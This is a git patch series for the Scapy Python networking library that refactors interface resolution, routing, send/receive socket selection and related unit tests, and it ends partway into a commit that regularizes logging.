def get_usbpcap_devices(iface, enabled=True): """Return a list of devices on an USBpcap interface""" _usbpcap_check() @@ -226,6 +267,7 @@ def __init__(self, iface=None, *args, **karg): " ".join(x[0] for x in get_usbpcap_interfaces())) raise NameError("No interface specified !" " See get_usbpcap_interfaces()") + iface = network_name(iface) self.outs = None args = ['-d', iface, '-b', '134217728', '-A', '-o', '-'] self.usbpcap_proc = subprocess.Popen( diff --git a/scapy/libs/winpcapy.py b/scapy/libs/winpcapy.py index c246f0dcea9..b6ae5aa96ff 100644 --- a/scapy/libs/winpcapy.py +++ b/scapy/libs/winpcapy.py @@ -12,7 +12,7 @@ import os from scapy.libs.structures import bpf_program -from scapy.consts import WINDOWS +from scapy.consts import WINDOWS, BSD if WINDOWS: # Try to load Npcap, or Winpcap @@ -66,23 +66,11 @@ class timeval(Structure): # sockaddr is used by pcap_addr. # For example if sa_family==socket.AF_INET then we need cast # with sockaddr_in -if WINDOWS: - class sockaddr(Structure): - _fields_ = [("sa_family", c_ushort), - ("sa_data", c_ubyte * 14)] - - class sockaddr_in(Structure): - _fields_ = [("sin_family", c_ushort), - ("sin_port", c_uint16), - ("sin_addr", 4 * c_ubyte)] - class sockaddr_in6(Structure): - _fields_ = [("sin6_family", c_ushort), - ("sin6_port", c_uint16), - ("sin6_flowinfo", c_uint32), - ("sin6_addr", 16 * c_ubyte), - ("sin6_scope", c_uint32)] -else: +# sockaddr has a different structure depending on the OS +if BSD: + # https://github.com/freebsd/freebsd/blob/master/sys/sys/socket.h + # https://opensource.apple.com/source/xnu/xnu-201/bsd/sys/socket.h.auto.html class sockaddr(Structure): _fields_ = [("sa_len", c_ubyte), ("sa_family", c_ubyte), @@ -112,6 +100,26 @@ class sockaddr_dl(Structure): ("sdl_alen", c_ubyte), ("sdl_slen", c_ubyte), ("sdl_data", 46 * c_ubyte)] + +else: + # https://github.com/torvalds/linux/blob/master/include/linux/socket.h + # https://docs.microsoft.com/en-us/windows/win32/winsock/sockaddr-2 + class sockaddr(Structure): + _fields_ = [("sa_family", c_ushort), + ("sa_data", c_ubyte * 14)] + + class sockaddr_in(Structure): + _fields_ = [("sin_family", c_ushort), + ("sin_port", c_uint16), + ("sin_addr", 4 * c_ubyte)] + + class sockaddr_in6(Structure): + _fields_ = [("sin6_family", c_ushort), + ("sin6_port", c_uint16), + ("sin6_flowinfo", c_uint32), + ("sin6_addr", 16 * c_ubyte), + ("sin6_scope", c_uint32)] + ## # END misc ## diff --git a/scapy/route.py b/scapy/route.py index ce2343b7afb..3e8031f7b8e 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -10,11 +10,9 @@ from __future__ import absolute_import - -import scapy.consts from scapy.config import conf from scapy.error import Scapy_Exception, warning -from scapy.modules import six +from scapy.interfaces import resolve_iface from scapy.utils import atol, ltoa, itom, plain_str, pretty_list @@ -37,10 +35,11 @@ def resync(self): def __repr__(self): rtlst = [] for net, msk, gw, iface, addr, metric in self.routes: + if_repr = resolve_iface(iface).description rtlst.append((ltoa(net), ltoa(msk), gw, - (iface.description if not isinstance(iface, six.string_types) else iface), # noqa: E501 + if_repr, addr, str(metric))) @@ -94,10 +93,7 @@ def ifchange(self, iff, addr): for i, route in enumerate(self.routes): net, msk, gw, iface, addr, metric = route - if scapy.consts.WINDOWS: - if iff.guid != iface.guid: - continue - elif iff != iface: + if iff != iface: continue if gw == '0.0.0.0': self.routes[i] = (the_net, the_msk, gw, iface, the_addr, metric) # noqa: E501 @@ -109,10 +105,7 @@ def ifdel(self, iff): self.invalidate_cache() new_routes = [] for rt in self.routes: - if scapy.consts.WINDOWS: - if iff.guid == rt[3].guid: - continue - elif iff == rt[3]: + if iff == rt[3]: continue new_routes.append(rt) self.routes = new_routes @@ -184,10 +177,7 @@ def get_if_bcast(self, iff): continue # Ignore default route "0.0.0.0" elif msk == 0xffffffff: continue # Ignore host-specific routes - if scapy.consts.WINDOWS: - if iff.guid != iface.guid: - continue - elif iff != iface: + if iff != iface: continue bcast = net | (~msk & 0xffffffff) bcast_list.append(ltoa(bcast)) @@ -198,12 +188,5 @@ def get_if_bcast(self, iff): conf.route = Route() -iface = conf.route.route(None, verbose=0)[0] - -if getattr(iface, "name", iface) == conf.loopback_name: - from scapy.arch import get_working_if - conf.iface = get_working_if() -else: - conf.iface = iface - -del iface +# Load everything, update conf.iface +conf.ifaces.reload() diff --git a/scapy/route6.py b/scapy/route6.py index 939df4be7e8..081d9fea487 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -17,6 +17,7 @@ from __future__ import absolute_import import socket from scapy.config import conf +from scapy.interfaces import resolve_iface from scapy.utils6 import in6_ptop, in6_cidr2mask, in6_and, \ in6_islladdr, in6_ismlladdr, in6_isincluded, in6_isgladdr, \ in6_isaddr6to4, in6_ismaddr, construct_source_candidate_set, \ @@ -24,7 +25,6 @@ from scapy.arch import read_routes6, in6_getifaddr from scapy.pton_ntop import inet_pton, inet_ntop from scapy.error import warning, log_loading -import scapy.modules.six as six from scapy.utils import pretty_list @@ -57,11 +57,11 @@ def __repr__(self): rtlst = [] for net, msk, gw, iface, cset, metric in self.routes: + if_repr = resolve_iface(iface).description rtlst.append(('%s/%i' % (net, msk), gw, - (iface if isinstance(iface, six.string_types) - else iface.description), - ", ".join(cset) if len(cset) > 0 else "", + if_repr, + cset, str(metric))) return pretty_list(rtlst, @@ -255,7 +255,7 @@ def route(self, dst=None, dev=None, verbose=conf.verb): # Deal with dev-specific request for cache search k = dst if dev is not None: - k = dst + "%%" + (dev if isinstance(dev, six.string_types) else dev.pcap_name) # noqa: E501 + k = dst + "%%" + dev if k in self.cache: return self.cache[k] @@ -324,7 +324,7 @@ def route(self, dst=None, dev=None, verbose=conf.verb): # Fill the cache (including dev-specific request) k = dst if dev is not None: - k = dst + "%%" + (dev if isinstance(dev, six.string_types) else dev.pcap_name) # noqa: E501 + k = dst + "%%" + dev self.cache[k] = res[0][2] return res[0][2] diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 628984566e4..1486434b4e4 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -20,6 +20,7 @@ from scapy.data import ETH_P_ALL from scapy.config import conf from scapy.error import warning +from scapy.interfaces import network_name, resolve_iface from scapy.packet import Gen, Packet from scapy.utils import get_temp_file, tcpdump, wrpcap, \ ContextManagerSubprocess, PcapReader @@ -30,8 +31,9 @@ from scapy.modules.six.moves import map from scapy.sessions import DefaultSession from scapy.supersocket import SuperSocket + if conf.route is None: - # unused import, only to initialize conf.route + # unused import, only to initialize conf.route and conf.iface* import scapy.route # noqa: F401 ################# @@ -322,9 +324,23 @@ def __gen_send(s, x, inter=0, loop=0, count=None, verbose=None, realtime=None, r return sent_packets +def _send(x, _func, inter=0, loop=0, iface=None, count=None, + verbose=None, realtime=None, + return_packets=False, socket=None, **kargs): + """Internal function used by send and sendp""" + need_closing = socket is None + iface = resolve_iface(iface or conf.iface) + socket = socket or _func(iface)(iface=iface, **kargs) + results = __gen_send(socket, x, inter=inter, loop=loop, + count=count, verbose=verbose, + realtime=realtime, return_packets=return_packets) + if need_closing: + socket.close() + return results + + @conf.commands.register -def send(x, inter=0, loop=0, count=None, verbose=None, realtime=None, - return_packets=False, socket=None, iface=None, *args, **kargs): +def send(x, iface=None, *args, **kargs): """ Send packets at layer 3 @@ -340,21 +356,16 @@ def send(x, inter=0, loop=0, count=None, verbose=None, realtime=None, :param monitor: (not on linux) send in monitor mode :returns: None """ - need_closing = socket is None - kargs["iface"] = _interface_selection(iface, x) - socket = socket or conf.L3socket(*args, **kargs) - results = __gen_send(socket, x, inter=inter, loop=loop, - count=count, verbose=verbose, - realtime=realtime, return_packets=return_packets) - if need_closing: - socket.close() - return results + iface = _interface_selection(iface, x) + return _send( + x, + lambda iface: iface.l3socket(), iface=iface, + *args, **kargs + ) @conf.commands.register -def sendp(x, inter=0, loop=0, iface=None, iface_hint=None, count=None, - verbose=None, realtime=None, - return_packets=False, socket=None, *args, **kargs): +def sendp(x, iface=None, iface_hint=None, socket=None, *args, **kargs): """ Send packets at layer 2 @@ -372,14 +383,14 @@ def sendp(x, inter=0, loop=0, iface=None, iface_hint=None, count=None, """ if iface is None and iface_hint is not None and socket is None: iface = conf.route.route(iface_hint)[0] - need_closing = socket is None - socket = socket or conf.L2socket(iface=iface, *args, **kargs) - results = __gen_send(socket, x, inter=inter, loop=loop, - count=count, verbose=verbose, - realtime=realtime, return_packets=return_packets) - if need_closing: - socket.close() - return results + return _send( + x, + lambda iface: iface.l2socket(), + *args, + iface=iface, + socket=socket, + **kargs + ) @conf.commands.register @@ -401,7 +412,7 @@ def sendpfast(x, pps=None, mbps=None, realtime=None, loop=0, file_cache=False, i """ if iface is None: iface = conf.iface - argv = [conf.prog.tcpreplay, "--intf1=%s" % iface] + argv = [conf.prog.tcpreplay, "--intf1=%s" % network_name(iface)] if pps is not None: argv.append("--pps=%i" % pps) elif mbps is not None: @@ -549,8 +560,9 @@ def srp(x, promisc=None, iface=None, iface_hint=None, filter=None, """ if iface is None and iface_hint is not None: iface = conf.route.route(iface_hint)[0] - s = conf.L2socket(promisc=promisc, iface=iface, - filter=filter, nofilter=nofilter, type=type) + iface = resolve_iface(iface or conf.iface) + s = iface.l2socket()(promisc=promisc, iface=iface, + filter=filter, nofilter=nofilter, type=type) result = sndrcv(s, x, *args, **kargs) s.close() return result @@ -681,7 +693,8 @@ def srflood(x, promisc=None, filter=None, iface=None, nofilter=None, *args, **ka :param filter: provide a BPF filter :param iface: listen answers only on the given interface """ - s = conf.L3socket(promisc=promisc, filter=filter, iface=iface, nofilter=nofilter) # noqa: E501 + iface = resolve_iface(iface or conf.iface) + s = iface.l3socket()(promisc=promisc, filter=filter, iface=iface, nofilter=nofilter) # noqa: E501 r = sndrcvflood(s, x, *args, **kargs) s.close() return r @@ -697,7 +710,8 @@ def sr1flood(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **karg :param filter: provide a BPF filter :param iface: listen answers only on the given interface """ - s = conf.L3socket(promisc=promisc, filter=filter, nofilter=nofilter, iface=iface) # noqa: E501 + iface = resolve_iface(iface or conf.iface) + s = iface.l3socket()(promisc=promisc, filter=filter, nofilter=nofilter, iface=iface) # noqa: E501 ans, _ = sndrcvflood(s, x, *args, **kargs) s.close() if len(ans) > 0: @@ -716,7 +730,8 @@ def srpflood(x, promisc=None, filter=None, iface=None, iface_hint=None, nofilter """ if iface is None and iface_hint is not None: iface = conf.route.route(iface_hint)[0] - s = conf.L2socket(promisc=promisc, filter=filter, iface=iface, nofilter=nofilter) # noqa: E501 + iface = resolve_iface(iface or conf.iface) + s = iface.l2socket()(promisc=promisc, filter=filter, iface=iface, nofilter=nofilter) # noqa: E501 r = sndrcvflood(s, x, *args, **kargs) s.close() return r @@ -732,7 +747,8 @@ def srp1flood(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kar :param filter: provide a BPF filter :param iface: listen answers only on the given interface """ - s = conf.L2socket(promisc=promisc, filter=filter, nofilter=nofilter, iface=iface) # noqa: E501 + iface = resolve_iface(iface or conf.iface) + s = iface.l2socket()(promisc=promisc, filter=filter, nofilter=nofilter, iface=iface) # noqa: E501 ans, _ = sndrcvflood(s, x, *args, **kargs) s.close() if len(ans) > 0: @@ -803,6 +819,7 @@ class AsyncSniffer(object): >>> print("nice weather today") >>> t.stop() """ + def __init__(self, *args, **kwargs): # Store keyword arguments self.args = args @@ -888,8 +905,9 @@ def _write_to_pcap(packets_list): quiet=quiet) )] = offline if not sniff_sockets or iface is not None: + iface = resolve_iface(iface or conf.iface) if L2socket is None: - L2socket = conf.L2listen + L2socket = iface.l2listen() if isinstance(iface, list): sniff_sockets.update( (L2socket(type=ETH_P_ALL, iface=ifname, *arg, **karg), @@ -1065,11 +1083,14 @@ def bridge_and_sniff(if1, if2, xfrm12=None, xfrm21=None, prn=None, L2socket=None "bridge_and_sniff() -- ignoring it.", arg) del kargs[arg] - def _init_socket(iface, count): + def _init_socket(iface, count, L2socket=L2socket): if isinstance(iface, SuperSocket): return iface, "iface%d" % count else: - return (L2socket or conf.L2socket)(iface=iface), iface + if not L2socket: + iface = resolve_iface(iface or conf.iface) + L2socket = iface.l2socket() + return L2socket(iface=iface), iface sckt1, if1 = _init_socket(if1, 1) sckt2, if2 = _init_socket(if2, 2) peers = {if1: sckt2, if2: sckt1} diff --git a/scapy/supersocket.py b/scapy/supersocket.py index ff80b756757..177b6563bd5 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -21,6 +21,7 @@ from scapy.data import MTU, ETH_P_IP, SOL_PACKET, SO_TIMESTAMPNS from scapy.compat import raw, bytes_encode from scapy.error import warning, log_runtime +from scapy.interfaces import network_name import scapy.modules.six as six import scapy.packet from scapy.utils import PcapReader, tcpdump @@ -222,7 +223,8 @@ def __init__(self, type=ETH_P_IP, filter=None, iface=None, promisc=None, nofilte self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 self.iface = iface if iface is not None: - self.ins.bind((self.iface, type)) + iface = network_name(iface) + self.ins.bind((iface, type)) if not six.PY2: try: # Receive Auxiliary Data (VLAN tags) @@ -361,14 +363,9 @@ def __init__(self, iface=None, promisc=None, filter=None, nofilter=False, args = ['-w', '-', '-s', '65535'] if iface is None and (WINDOWS or DARWIN): iface = conf.iface - if WINDOWS: - try: - iface = iface.pcap_name - except AttributeError: - pass self.iface = iface if iface is not None: - args.extend(['-i', self.iface]) + args.extend(['-i', network_name(iface)]) if not promisc: args.append('-p') if not nofilter: diff --git a/scapy/themes.py b/scapy/themes.py index f9cbc300648..583eccb329f 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -11,7 +11,6 @@ # Color themes # ################## -import cgi import sys @@ -44,6 +43,7 @@ class ColorTable: "blink": ("\033[5m", ""), "invert": ("\033[7m", ""), } + inv_map = {v[0]: v[1] for k, v in colors.items()} def __repr__(self): return "" @@ -52,8 +52,7 @@ def __getattr__(self, attr): return self.colors.get(attr, [""])[0] def ansi_to_pygments(self, x): # Transform ansi encoded text to Pygments text # noqa: E501 - inv_map = {v[0]: v[1] for k, v in self.colors.items()} - for k, v in inv_map.items(): + for k, v in self.inv_map.items(): x = x.replace(k, " " + v) return x.strip() @@ -363,7 +362,8 @@ def apply_ipython_style(shell): if isinstance(conf.color_theme, (FormatTheme, NoTheme)): # Formatable if isinstance(conf.color_theme, HTMLTheme): - prompt = cgi.escape(conf.prompt) + from scapy.compat import html_escape + prompt = html_escape(conf.prompt) elif isinstance(conf.color_theme, LatexTheme): from scapy.utils import tex_escape prompt = tex_escape(conf.prompt) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index af292acb113..5f861bcd328 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -515,9 +515,9 @@ def import_UTscapy_tools(ses): ses["retry_test"] = retry_test ses["Bunch"] = Bunch if WINDOWS: - from scapy.arch.windows import _route_add_loopback, IFACES + from scapy.arch.windows import _route_add_loopback _route_add_loopback() - ses["IFACES"] = IFACES + ses["conf"].ifaces = conf.ifaces ses["conf"].route.routes = conf.route.routes ses["conf"].route6.routes = conf.route6.routes diff --git a/scapy/utils.py b/scapy/utils.py index 6eab9cc267c..5b792347ed2 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -26,7 +26,7 @@ import threading import scapy.modules.six as six -from scapy.modules.six.moves import range, input +from scapy.modules.six.moves import range, input, zip_longest from scapy.config import conf from scapy.consts import DARWIN, WINDOWS, WINDOWS_XP, OPENBSD @@ -1940,20 +1940,46 @@ def get_terminal_width(): def pretty_list(rtlst, header, sortBy=0, borders=False): - """Pretty list to fit the terminal, and add header""" + """ + Pretty list to fit the terminal, and add header. + + :param rtlst: a list of tuples. each tuple contains a value which can + be either a string or a list of string. + :param sortBy: the column id (starting with 0) which whill be used for + ordering + :param borders: whether to put borders on the table or not + """ if borders: _space = "|" else: _space = " " + cols = len(header[0]) # Windows has a fat terminal border - _spacelen = len(_space) * (len(header) - 1) + (10 if WINDOWS else 0) + _spacelen = len(_space) * (cols - 1) + int(WINDOWS) _croped = False # Sort correctly rtlst.sort(key=lambda x: x[sortBy]) + # Resolve multi-values + for i, line in enumerate(rtlst): + ids = [] + values = [] + for j, val in enumerate(line): + if isinstance(val, list): + ids.append(j) + values.append(val or " ") + if values: + del rtlst[i] + k = 0 + for ex_vals in zip_longest(*values, fillvalue=" "): + extra_line = ([" "] * cols) if k else list(line) + for j, h in enumerate(ids): + extra_line[h] = ex_vals[j] + rtlst.insert(i + k, tuple(extra_line)) + k += 1 # Append tag rtlst = header + rtlst # Detect column's width - colwidth = [max([len(y) for y in x]) for x in zip(*rtlst)] + colwidth = [max(len(y) for y in x) for x in zip(*rtlst)] # Make text fit in box (if required) width = get_terminal_width() if conf.auto_crop_tables and width: @@ -1982,8 +2008,7 @@ def pretty_list(rtlst, header, sortBy=0, borders=False): if borders: rtlst.insert(1, tuple("-" * x for x in colwidth)) # Compile - rt = "\n".join(((fmt % x).strip() for x in rtlst)) - return rt + return "\n".join(fmt % x for x in rtlst) def __make_table(yfmtfunc, fmtfunc, endline, data, fxyz, sortx=None, sorty=None, seplinefunc=None, dump=False): # noqa: E501 diff --git a/scapy/utils6.py b/scapy/utils6.py index 1e0375968cd..c2c68c941f1 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -832,7 +832,7 @@ def in6_isvalid(address): otherwise.""" try: - socket.inet_pton(socket.AF_INET6, address) + inet_pton(socket.AF_INET6, address) return True except Exception: return False diff --git a/test/bpf.uts b/test/bpf.uts index a0dd954deb5..af8ad3dd7e7 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -43,43 +43,6 @@ attach_filter(fd, "arp or icmp", conf.iface) iflist = get_if_list() len(iflist) > 0 - -= Get working network interfaces -~ needs_root - -from scapy.arch.bpf.core import get_working_if, get_working_ifaces -ifworking = get_working_ifaces() -assert len(ifworking) -assert get_working_if() == ifworking[0] - - -= Get working network interfaces order - -import mock -from scapy.arch.bpf.core import get_working_ifaces - -@mock.patch("scapy.arch.bpf.core.os.close") -@mock.patch("scapy.arch.bpf.core.fcntl.ioctl") -@mock.patch("scapy.arch.bpf.core.get_dev_bpf") -@mock.patch("scapy.arch.bpf.core.get_if") -@mock.patch("scapy.arch.bpf.core.get_if_list") -@mock.patch("scapy.arch.bpf.core.os.getuid") -def test_get_working_ifaces(mock_getuid, mock_get_if_list, mock_get_if, - mock_get_dev_bpf, mock_ioctl, mock_close): - mock_getuid.return_value = 0 - mock_get_if_list.return_value = ['igb0', 'em0', 'msk0', 'epair0a', 'igb1', - 'vlan20', 'igb10', 'igb2'] - mock_get_if.return_value = (b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - b'\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00' - b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') - mock_get_dev_bpf.return_value = (31337,) - mock_ioctl.return_value = 0 - mock_close.return_value = 0 - return get_working_ifaces() - -assert test_get_working_ifaces() == ['em0', 'igb0', 'msk0', 'epair0a', 'igb1', - 'igb2', 'igb10', 'vlan20'] - = Misc functions ~ needs_root diff --git a/test/linux.uts b/test/linux.uts index 12f080e80c6..fabfde913a1 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -76,14 +76,6 @@ from mock import patch with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo_x'): routes = read_routes() -= catch get_working_if only loopback -~ linux - -from mock import patch - -with patch('scapy.arch.linux.get_if_list', side_effect=lambda: [conf.loopback_name]): - assert get_working_if() == conf.loopback_name - = catch loopback device no address assigned ~ linux needs_root @@ -123,6 +115,8 @@ assert(exit_status == 0) = IPv6 link-local address selection +IFACES._add_fake_iface("scapy0") + from mock import patch conf.route6.routes = [('fe80::', 64, '::', 'scapy0', ['fe80::e039:91ff:fe79:1910'], 256)] conf.route6.ipv6_ifaces = set(['scapy0']) @@ -238,6 +232,7 @@ except subprocess.CalledProcessError: except Exception: assert False +conf.ifaces.reload() if_list = get_if_list() assert ('veth_scapy_0' in if_list) assert ('veth_scapy_1' in if_list) @@ -265,6 +260,7 @@ try: veth.down() veth.destroy() + conf.ifaces.reload() if_list = get_if_list() assert ('veth_scapy_0' not in if_list) assert ('veth_scapy_1' not in if_list) diff --git a/test/regression.uts b/test/regression.uts index 038596bac56..1348ab407c1 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -127,15 +127,6 @@ except: assert not conf.use_bpf -if not conf.use_pcap: - a = six.moves.builtins.__dict__ - conf.interactive = True - conf.use_pcap = True - assert a["get_if_list"] == scapy.arch.pcapdnet.get_if_list - conf.use_pcap = False - assert a["get_if_list"] == scapy.arch.linux.get_if_list - conf.interactive = False - = Configuration conf.use_* WINDOWS ~ windows @@ -147,6 +138,18 @@ except: assert not conf.use_bpf += Configuration conf.use_pcap +~ linux + +if not conf.use_pcap: + assert not conf.iface.provider.libpcap + conf.use_pcap = True + assert conf.iface.provider.libpcap + for iface in conf.ifaces.values(): + assert iface.provider.libpcap + conf.use_pcap = False + assert not conf.iface.provider.libpcap + = Test layer filtering ~ filter @@ -182,22 +185,8 @@ bytes_hex(get_if_raw_addr(conf.iface)) def get_dummy_interface(): """Returns a dummy network interface""" - if WINDOWS: - data = {} - data["name"] = "dummy0" - data["description"] = "Does not exist" - data["win_index"] = -1 - data["guid"] = "{1XX00000-X000-0X0X-X00X-00XXXX000XXX}" - data["invalid"] = True - data["ipv4_metric"] = 1 - data["ipv6_metric"] = 1 - data["mac"] = "00:00:00:00:00:00" - data["ips"] = ["127.0.0.1", "::1"] - data["pcap_name"] = "\\Device\\NPF_" + data["guid"] - data["flags"] = 0 - return NetworkInterface(data) - else: - return "dummy0" + IFACES._add_fake_iface("dummy0") + return "dummy0" get_if_raw_addr(get_dummy_interface()) @@ -207,6 +196,56 @@ get_working_if() get_if_raw_addr6(conf.iface) += More Interfaces related functions + +# Test name resolution +old = conf.iface +conf.iface = conf.iface.name +assert conf.iface == old + +assert isinstance(conf.iface, NetworkInterface) +assert conf.iface.is_valid() + +import mock +@mock.patch("scapy.interfaces.conf.route.routes", []) +@mock.patch("scapy.interfaces.conf.ifaces", {}) +def _test_get_working_if(): + assert get_working_if() == conf.loopback_name + +assert conf.iface + "a" # left + +assert "hey! are you, ready to go ? %s" % conf.iface # format +assert "cuz you know the way to go" + conf.iface # right + + +_test_get_working_if() + += Test conf.ifaces + +conf.iface +conf.ifaces + +assert conf.iface in conf.ifaces.values() +assert conf.ifaces.dev_from_index(conf.iface.index) == conf.iface +assert conf.ifaces.dev_from_networkname(conf.iface.network_name) == conf.iface + +conf.ifaces.data = {'a': NetworkInterface(InterfaceProvider(), {"name": 'a', "network_name": 'a', "description": 'a', "ips": ["127.0.0.1", "::1", "::2", "127.0.0.2"], "mac": 'aa:aa:aa:aa:aa:aa'})} + +with ContextManagerCaptureOutput() as cmco: + conf.ifaces.show() + output = cmco.get_output() + +data = """ +Source Index Name MAC IPv4 IPv6 +Unknown 0 a aa:aa:aa:aa:aa:aa 127.0.0.1 ::1 + 127.0.0.2 ::2 +""".strip() + +output = [x.strip() for x in output.strip().split("\n")] +data = [x.strip() for x in data.strip().split("\n")] + +assert output == data + +conf.ifaces.reload() + = Test read_routes6() - default output routes6 = read_routes6() @@ -1675,6 +1714,7 @@ asrm = AS_resolver_multi(MockAS_resolver()) assert len(asrm.resolve(["8.8.8.8", "8.8.4.4"])) == 0 = sendpfast +~ tcpreplay old_interactive = conf.interactive conf.interactive = False @@ -4336,6 +4376,11 @@ assert defragment6(pkts).plen == 1508 ############ + Test Route6 class += Fake interfaces +IFACES._add_fake_iface("eth0") +IFACES._add_fake_iface("lo") +IFACES._add_fake_iface("scapy0") + = Route6 - Route6 flushing conf_iface = conf.iface conf.iface = "eth0" @@ -4346,6 +4391,7 @@ conf.route6.flush() not conf.route6.routes = Route6 - Route6.route + conf.route6.flush() conf.route6.ipv6_ifaces = set(['lo', 'eth0']) conf.route6.routes=[ @@ -4356,7 +4402,12 @@ conf.route6.routes=[ ( '2001:db8:0:4444::', 64, '::', 'eth0', ['2001:db8:0:4444:20f:1fff:feca:4650'], 1), ( '::', 0, 'fe80::20f:34ff:fe8a:8aa1', 'eth0', ['2001:db8:0:4444:20f:1fff:feca:4650', '2002:db8:0:4444:20f:1fff:feca:4650'], 1) ] -conf.route6.route("2002::1") == ('eth0', '2002:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') and conf.route6.route("2001::1") == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') and conf.route6.route("fe80::20f:1fff:feab:4870") == ('eth0', 'fe80::20f:1fff:feca:4650', '::') and conf.route6.route("::1") == ('lo', '::1', '::') and conf.route6.route("::") == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') and conf.route6.route('ff00::') == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') +assert conf.route6.route("2002::1") == ('eth0', '2002:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') +assert conf.route6.route("2001::1") == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') +assert conf.route6.route("fe80::20f:1fff:feab:4870") == ('eth0', 'fe80::20f:1fff:feca:4650', '::') +assert conf.route6.route("::1") == ('lo', '::1', '::') +assert conf.route6.route("::") == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') +assert conf.route6.route('ff00::') == ('eth0', '2001:db8:0:4444:20f:1fff:feca:4650', 'fe80::20f:34ff:fe8a:8aa1') conf.iface = conf_iface conf.route6.resync() if not len(conf.route6.routes): @@ -9095,6 +9146,9 @@ test_netbsd_7_0() import scapy +IFACES._add_fake_iface("enp3s0") +IFACES._add_fake_iface("lo") + old_routes = conf.route.routes old_iface = conf.iface old_loopback = conf.loopback_name @@ -9124,10 +9178,15 @@ finally: conf.iface = old_iface conf.route.routes = old_routes conf.route.invalidate_cache() + IFACES.reload() = Mocked IPv6 routes calls +IFACES._add_fake_iface("enp3s0") +IFACES._add_fake_iface("lo") + +old_routes = conf.route6.routes old_iface = conf.iface old_loopback = conf.loopback_name try: diff --git a/test/windows.uts b/test/windows.uts index 4754ad1867b..49db64e768c 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -25,31 +25,19 @@ assert select_objects([TimeOutSelector()], 1) == [] ############ + Windows arch unit tests -= Test pcapname += Test network_name iface = conf.iface -assert pcapname(iface.name) == iface.pcap_name -assert pcapname(iface.description) == iface.pcap_name -assert pcapname(iface.pcap_name) == iface.pcap_name +assert network_name(iface.name) == iface.network_name +assert network_name(iface.description) == iface.network_name +assert network_name(iface.network_name) == iface.network_name -= show_interfaces - -from scapy.arch import show_interfaces - -with ContextManagerCaptureOutput() as cmco: - show_interfaces() - lines = cmco.get_output().split("\n")[1:] - for l in lines: - if not l.strip(): - continue - int(l[:2]) - -= dev_from_pcapname += dev_from_networkname from scapy.config import conf -assert dev_from_pcapname(conf.iface.pcap_name).guid == conf.iface.guid +assert dev_from_networkname(conf.iface.network_name).guid == conf.iface.guid = test pcap_service_status @@ -74,7 +62,7 @@ assert pcap_service_status()[2] == True def _test_autostart_ui(mocked_getiflist): mocked_getiflist.side_effect = lambda: [] IFACES.reload() - assert all(x.win_index < 0 for x in IFACES.data.values()) + assert all(x.index < 0 for x in IFACES.data.values()) try: old_ifaces = IFACES.data.copy() diff --git a/tox.ini b/tox.ini index ff7e5769750..75834c6a963 100644 --- a/tox.ini +++ b/tox.ini @@ -15,7 +15,7 @@ description = "Scapy unit tests" whitelist_externals = sudo passenv = PATH PWD PROGRAMFILES WINDIR SYSTEMROOT # Used by scapy - SCAPY_USE_PCAPDNET + SCAPY_USE_LIBPCAP deps = mock # cryptography requirements setuptools>=18.5 From 9a9853f39f091e781321c92b574ec612e1f62ddb Mon Sep 17 00:00:00 2001 From: Gabriel Date: Fri, 25 Sep 2020 14:58:34 +0200 Subject: [PATCH 0285/1632] Regularize logging (#2819) * Improvements to Scapy's logging * Throw deprecation warnings when necessary * Regularize logging in Scapy --- CONTRIBUTING.md | 25 +++++++++++++++++ doc/scapy/extending.rst | 20 +++++++++++++- scapy/ansmachine.py | 12 ++++++--- scapy/arch/libpcap.py | 15 +++++++---- scapy/arch/linux.py | 22 +++++++++------ scapy/arch/unix.py | 13 +++++---- scapy/arch/windows/__init__.py | 37 ++++++++++++++----------- scapy/automaton.py | 12 ++++++--- scapy/config.py | 10 ++++--- scapy/consts.py | 4 +++ scapy/error.py | 34 +++++++++++++++++++---- scapy/fields.py | 8 ++++-- scapy/layers/dns.py | 35 ++++++++++++++++-------- scapy/layers/inet.py | 49 +++++++++++++++++++++++----------- scapy/layers/inet6.py | 4 +-- scapy/main.py | 36 +++++++------------------ scapy/pipetool.py | 12 ++++----- scapy/plist.py | 4 --- scapy/route.py | 2 +- scapy/utils.py | 6 ++++- test/tls/example_client.py | 8 ------ test/tls/example_server.py | 8 ------ 22 files changed, 242 insertions(+), 134 deletions(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index b3565a23acd..c1a159a5a5a 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -112,6 +112,31 @@ parsed from a string (during a network capture or a PCAP file read). Adding inefficient code here will have a disastrous effect on Scapy's performances. +### Logging + +Scapy has an internal logging system based on `logging`. + +In the past, Scapy was generally too verbose on packet dissection, +leading many new users to disable all logs, which makes it harder for them +to find real issues 